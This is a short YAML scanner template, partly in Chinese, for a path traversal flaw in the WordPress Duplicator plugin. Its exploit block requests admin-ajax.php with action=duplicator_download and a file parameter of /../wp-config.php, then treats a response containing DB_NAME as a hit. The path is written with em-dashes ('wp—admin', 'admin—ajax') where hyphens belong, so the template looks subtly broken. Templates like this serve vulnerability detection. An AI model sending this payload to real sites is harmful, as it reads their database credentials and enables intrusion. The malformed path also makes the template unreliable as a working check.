product: WordPress
vName: WordPress duplicator Path Traversal
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
            logic: and
